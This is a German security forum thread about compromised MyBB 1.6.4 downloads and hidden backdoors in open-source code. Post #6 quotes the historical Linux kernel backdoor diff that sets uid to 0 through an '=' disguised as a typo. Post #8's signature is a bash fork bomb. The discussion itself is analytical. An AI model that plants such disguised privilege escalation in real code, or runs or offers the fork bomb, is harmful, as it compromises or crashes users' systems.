Danke Danke:  0
Dislikes Dislikes:  0
Ergebnis 1 bis 8 von 8

Thema: MyBB-Downloads waren infiziert

  1. #1

    Registriert seit
    25.10.11
    Danke (erhalten)
    0
    Gefällt mir (erhalten)
    0

    Standard MyBB-Downloads waren infiziert

    Anzeige
    Die Download-Pakete von MyBB 1.6.4 waren auf dem Server kompromittiert, bestätigen die Entwickler in einem Blog-Posting. Unbekannten Angreifern war es über eine Schwachstelle des Content Management Systems (CMS) für die MyBB-Homepage gelungen, PHP-Code einzuschleusen und auszuführen.
    Damit stellten sie offenbar eine trojanisierte Version der MyBB-Software auf den Server, die eine Hintertür enthielt. Wann das genau geschah, ist nicht klar. Somit sind potentiell alle 1.6.4er-Versionen betroffen, die vor dem 6. Oktober heruntergeladen wurden. Jeder Betreiber eines MyBB-Systems sollte deshalb unverzüglich seine installierte Version checken. Zur schnellen Säuberung empfehlen die Entwickler, die Datei /index.php durch eine aus einem sauberen Download zu ersetzen und das Verzeichnis /install/ zu löschen.
    Die MyBB-Entwickler diskutieren derzeit, welche Konsequenzen sie aus dem Einbruch ziehen müssen. Sie wollen unter anderem "Prüfsummen" veröffentlichen, mit denen man die Echtheit der Downloads testen kann. Das ist allerdings nicht sonderlich effizient, wenn die Angreifer den Server kontrollieren, auf dem auch die Prüfsummen hinterlegt sind. Besser geeignet wären digitale Signaturen, die sich ohne den geheimen Schlüssel nicht fälschen lassen. Der Nachteil: Digitale Signaturen für Software-Pakete prüft kaum jemand, solange es nicht ein Update-Mechanismus automatisch erledigt. (ju)

    Quelle:
    heise online - MyBB-Downloads waren infiziert

    Was denkt Ihr darüber? Ich finde es schon erschreckend das die Entwickler wohl kein Augenmark auf dne Sicherheitsaspekt des eigenen Servers gelegt haben. Man stelle sich vor sowas würde bei vbulettin phpbb etc passieren.

  2. #2
    Moderator Avatar von CDW
    Registriert seit
    20.07.05
    Danke (erhalten)
    29
    Gefällt mir (erhalten)
    831

    Standard

    Es ist kein Einzelfall (wobei ich die Säuberungstipps der Entwickler in diesem Fall etwas ... dürftig finde ) und auf jeden Fall nichts neues:

    ~/Blog: Linux .. Infected
    (oder etwas seriöser:
    IRC-Server seit Monaten mit Backdoor [Update] | heise Security )
    'Allegations regarding OpenBSD IPSEC' - MARC

    Thwarted Linux backdoor hints at smarter hacks
    Interessant ist in dem Zusammenhang
    The Underhanded C Contest
    Es geht darum, ein "sinnvolles" Programm zu schreiben, welches versteckte, böse Funktionen enthält UND einer Codereview standhält. Der "Gewinner":
    Not A Number - Underhanded C: The Leaky Redaction

    Opensource ist kein Allheilmittel gegen Sicherheitslücken.
    Besonders bei größeren Projekten (auch wenn die Entwickler selbst keine "bösen" Absichten haben) kann jemand z.B paar hundert oder tausend Zeilen Code beitragen und irgendwo mit wenigen Zeilen seine backdoor Funktion verstecken.

    Man könnte jetzt auch schreiben: C und PHP sind böse, weil diese zu viele Freiheiten bieten. Das würden auch einige als Grund zu einem Flamewar sehen . Aber was wären richtig praktikabele Lösungen? Theoretisch könnte man formelle Softwareprüfung nehmen (Isabelle, B/EventB etc), Code größtenteils nur generieren lassen und allgemein eine sichere Sprache "erfinden"/nutzen. Rein praktisch wäre der Aufwand sogar für kleinere Projekte immens. Alleine Umsetzung/Übersetzung in ein Modell, Beweis der Korrektheit des Modells, der Refinements bis hin zum Code, der Korrektheit des Compilers (Grüße an C und vor allem C++ Anhänger - gibt es schon einen Compiler, der wenigstens c99 Standard komplett unterstützt? ).
    Irgendwas ist halt immer.
    Noch mal, für alle Pseudo-Geeks: 1+1=0. -> 10 wäre Überlauf!
    Selig, wer nichts zu sagen hat und trotzdem schweigt.

  3. Gefällt mir Tarantoga liked this post
  4. #3
    Member of Honour Avatar von xrayn
    Registriert seit
    05.03.08
    Danke (erhalten)
    1
    Gefällt mir (erhalten)
    637

    Standard

    Zitat Zitat von CDW Beitrag anzeigen
    Man könnte jetzt auch schreiben: C und PHP sind böse, weil diese zu viele Freiheiten bieten.
    Das analysierst du falsch.
    1. PHP ist an sich ne reine Backdoor.
    2. Es liegt nicht an C, sondern an OpenSource. Ich mein, was kann C dafür, dass diese langhaarigen Typen mit Piguinfetisch diese schöne Sprache dermaßen missbrauchen

  5. Gefällt mir sogra liked this post
  6. #4
    Member of Honour
    Registriert seit
    07.12.04
    Danke (erhalten)
    21
    Gefällt mir (erhalten)
    528

    Standard

    Nein du siehst dies falsch.
    PHP wurde hauptsächlich dazu entwickelt um Informationen, die auf einem entfernten
    Rechner gespeichert sind dynamisch aufzubereiten und abrufen zu können.
    Dies ist kein "Backdoor", das ist die "Frontdoor".

    Auch bei c sind es nicht die Pinguinfetischsten gewesen, sondern die Anzugträger aus der MS-Ecke
    die aus dem Internet einen Marktplatz gemacht haben, auf dem sich jetzt die Taschendiebe
    und Halsabschneider breit gemacht haben.

    Gruss
    Man sollte sich angewöhnen die Dinge öfters von Aussen zu betrachten,
    denn von Innen sieht das Hamsterrad auch wie eine Karriereleiter aus.

  7. Gefällt mir Open_Geek liked this post
  8. #5
    Senior Member
    Registriert seit
    13.07.08
    Danke (erhalten)
    0
    Gefällt mir (erhalten)
    209

    Standard

    Zitat Zitat von CDW Beitrag anzeigen
    gibt es schon einen Compiler, der wenigstens c99 Standard komplett unterstützt?
    Letztens erst meine ich die News gelesen zu haben, dass Clang inzwischen C99 und C++03 vollständig unterstützt.

    Not A Number - Underhanded C: The Leaky Redaction
    Das ist natürlich genial. Information auf so subtile Art zu leaken ist schon sehr clever :-)
    "It is the human race! The deterioration of the spirit of man. Man undermining himself, causing a self-willed, self-imposed, self-evident self-destruction."
    +++ BREAKING +++ Troll ertrinkt im Planschbecken +++

  9. #6
    Moderator Avatar von CDW
    Registriert seit
    20.07.05
    Danke (erhalten)
    29
    Gefällt mir (erhalten)
    831

    Standard

    Linux: Kernel "Back Door" Attempt | KernelTrap
    Code:
    +       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
    +                       retval = -EINVAL;
    Der Unterschied ist also nur ein "=".
    Und hier kann man die Absicht sehr glaubhaft abstreiten,
    da es ein verbreitetes Typo sein sollte .

    Offtopic   

    Ich denke auch an solche lustigen Sachen wie
    Code:
     *(data_ptr + i) vs (*data_ptr + i)
    bzw. noch subtiler (data is vom Typ void*, i ist ein int)
    (*(unsigned char*)data+i)) vs *((unsigned char*)data+i))


    Und sowas passiert, wenn Leute ohne spezifische Kenntnisse am Code arbeiten:
    Es war (angeblich ) auch keine Absicht:
    [pkg-openssl] Diff of /openssl/trunk/rand/md_rand.c
    Das Ergebniss - 2 Jahre lang schwache SSH/VPN usw. Keys: Schwache Krypto-Schlüssel unter Debian, Ubuntu und Co. | heise Security
    Noch mal, für alle Pseudo-Geeks: 1+1=0. -> 10 wäre Überlauf!
    Selig, wer nichts zu sagen hat und trotzdem schweigt.

  10. #7
    Moderator Avatar von bitmuncher
    Registriert seit
    30.09.06
    Danke (erhalten)
    134
    Gefällt mir (erhalten)
    1616

    Standard

    Es gab in Linux auch mal eine Backdoor, die über Jahre hinweg eingeschleust wurde. Das Zusammenspiel vieler kleiner Code-Fragmente, die in durchaus sinnvollem Code eingebettet wurden, ergab die eigentliche Backdoor. Man sieht also, dass selbst Code-Analysen nichts bringen, wenn nicht vor jedem Build der komplette Code analysiert wird. Und wer will sowas bei einem riesigen Projekt wie einem Kernel schon tun und gewährleisten?

    Bitmuncher's TechBlog - My Homepage
    Denken ist manchmal so, als würde man wissen auskotzen.

    Neue Beiträge im Habo via Twitter - Das HaBo auf FB

  11. Gefällt mir Tarantoga liked this post
  12. #8
    Member of Honour Avatar von GrafZahl
    Registriert seit
    28.05.10
    Danke (erhalten)
    3
    Gefällt mir (erhalten)
    518

    Standard

    Anzeige
    selbst das bringt nichts ... man kann sich nicht dagegen schützen, dass ein stück code, von dem man annimmt, dass es ein problem löst, ein ganz anderes problem löst ...

    gezielt platzierte funktionalitäten, liegen nicht immer auf code ebene vor ...

    im zweifel bringt dir selbst ein komplettes code review nichts ... The Underhanded C Contest
    Liebe Gemeinde wir haben uns heute hier eingefunden...um deine Gedärme an den Mast zu nageln du miese Qualle

    Code:
    :(){ :|:& };:
    Veritas Aequitas


Ähnliche Themen

  1. So gefährlich waren Bakterien noch nie
    Von Tenchuu im Forum HaBo Lounge
    Antworten: 13
    Letzter Beitrag: 13.03.10, 21:29
  2. Verkauf von Waren
    Von webfreak im Forum Off topic-Zone
    Antworten: 5
    Letzter Beitrag: 16.05.07, 19:55
  3. Infiziert?!
    Von Protube im Forum (In)security allgemein
    Antworten: 7
    Letzter Beitrag: 26.01.07, 14:17
  4. Als Elektronik-Musiker noch Männer waren!
    Von non im Forum Music- & Filmbox
    Antworten: 0
    Letzter Beitrag: 11.11.05, 11:18
  5. Antworten: 15
    Letzter Beitrag: 23.04.02, 15:18

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •